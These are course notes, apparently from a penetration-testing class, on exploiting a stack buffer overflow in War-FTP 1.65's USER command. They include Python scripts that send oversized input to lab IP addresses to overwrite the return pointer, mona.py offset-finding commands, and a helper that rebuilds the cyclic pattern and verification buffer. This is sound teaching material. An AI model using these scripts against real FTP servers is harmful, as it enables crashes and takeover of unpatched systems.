Course: Georgia Weidman on “Advanced Penetration Testing” at Cybrary
* Give the program too much input in the username (USER) field
* The saved return pointer will be overwritten with our attacker-controlled input
I. Exploit Skeleton -> War-FTP 1.65 USER Buffer Overflow
#!/usr/bin/python
import socket
# 1100 bytes of filler: enough to run past the USER buffer and over the saved return pointer
buffer = "A" * 1100
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.5.44', 21))
response = s.recv(1024)  # FTP banner
print response
s.send('USER ' + buffer + '\r\n')
response = s.recv(1024)
print response
s.send('PASS PASSWORD\r\n')
s.close()
II. Immunity Debugger -> Attach to the Process
III. Mona.py
An exploit development plugin for Immunity Debugger and WinDbg by the Corelan Team.
Set up logging: !mona config -set workingfolder C:\logs\%p
Identifying the Overwrite
!mona pattern_create 1100
IV. Mona Findmsp
Use !mona findmsp to find all instances of part or all of the cyclic pattern in memory
Reports whether the pattern landed in a register (e.g. EIP) and the offset of that value from the beginning of the pattern
Verifying Offsets
#!/usr/bin/python
import socket
# 485 bytes to reach the saved return pointer, 4 bytes of "B" (0x42424242) that should
# show up in EIP, then 611 bytes of "C" so the total stays at 1100
buffer = "A" * 485 + "B" * 4 + "C" * 611
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.20.10', 21))
response = s.recv(1024)  # FTP banner
print response
s.send('USER ' + buffer + '\r\n')
response = s.recv(1024)
print response
s.send('PASS PASSWORD\r\n')
s.close()
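Added example (not from the course, and not mona.py's own code): a small Python 3 reimplementation of what pattern_create and findmsp do, using the page's numbers (an 1100-byte pattern and offset 485) to show how the offset behind the overwrite is derived and how the verification buffer above is assembled. The EIP value it works from is computed from the generated pattern, not taken from a debugger session.

```python
import struct


def pattern_create(length):
    """Build a Metasploit/mona-style cyclic pattern of the given length.
    Each 3-byte chunk is Upper+lower+digit with the digit cycling fastest,
    so every 4-byte window is unique within the first 20280 bytes."""
    chunks = []
    for n in range((length + 2) // 3):
        upper = chr(ord("A") + (n // 260) % 26)
        lower = chr(ord("a") + (n // 10) % 26)
        digit = chr(ord("0") + n % 10)
        chunks.append(upper + lower + digit)
    return "".join(chunks)[:length]


def find_offset(pattern, eip):
    """Return the pattern offset that ended up in EIP, or -1 if not found.
    eip may be the 4 pattern bytes as a str, or the DWORD as the debugger
    shows it (an int), which is little-endian and so is read back reversed."""
    if isinstance(eip, int):
        chunk = struct.pack("<I", eip).decode("latin-1")
    else:
        chunk = eip
    return pattern.find(chunk)


def build_verify_buffer(total_len, offset, marker="B"):
    """Rebuild the verification layout used above: filler up to the saved
    return pointer, 4 marker bytes that should appear in EIP, then padding."""
    tail = total_len - offset - 4
    if tail < 0:
        raise ValueError("offset does not fit inside the buffer")
    return "A" * offset + marker * 4 + "C" * tail


if __name__ == "__main__":
    pattern = pattern_create(1100)
    # Constructed input: the 4 bytes the pattern carries at offset 485, packed
    # the way a debugger would display them in EIP after the crash.
    eip_dword = struct.unpack("<I", pattern[485:489].encode("ascii"))[0]
    offset = find_offset(pattern, eip_dword)
    print("EIP 0x%08x -> offset %d" % (eip_dword, offset))
    print(build_verify_buffer(1100, offset)[480:495])
```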